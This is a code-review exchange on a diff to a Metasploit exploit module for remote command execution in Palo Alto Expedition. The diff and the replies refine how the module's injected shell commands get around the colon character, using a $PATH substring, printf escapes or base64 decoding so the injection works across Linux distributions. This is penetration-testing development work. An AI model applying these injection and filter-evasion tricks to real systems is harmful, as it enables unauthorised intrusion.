modules/exploits/linux/http/paloalto_expedition_rce.rb

```diff
@@ -177,7 +173,7 @@ def execute_command(cmd)
     data = res.get_json_document
     fail_with(Failure::UnexpectedReply, "Unexpected reply from the server: #{data}") unless data['success'] == true
 
-    cmd = cmd.gsub('http://', '').gsub(':', '$(echo $PATH|cut -c16)')
+    cmd = cmd.gsub('http://', '').gsub('https://', '').gsub(':', '$(echo $PATH|cut -c16)') # ':' breaks the injection; $PATH on Ubuntu 20.04 contains '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games', which is used as an alternative way to get ':'
```

Comment:
Would this trick work on other distributions?

Reply:
Or potentially:

```
printf "\x3a"
```

Reply:
I'm guessing @cdelafuente-r7's suggestion wasn't meant to include the `\n`:

```
$ echo Ogo= | base64 -d | xxd 
00000000: 3a0a                                     :.
```

So just `Og== | base64 -d` (from `echo -n ':' | base64`) I believe

Reply:
Nice, that should make it more reliable throughout different distributions, thank you.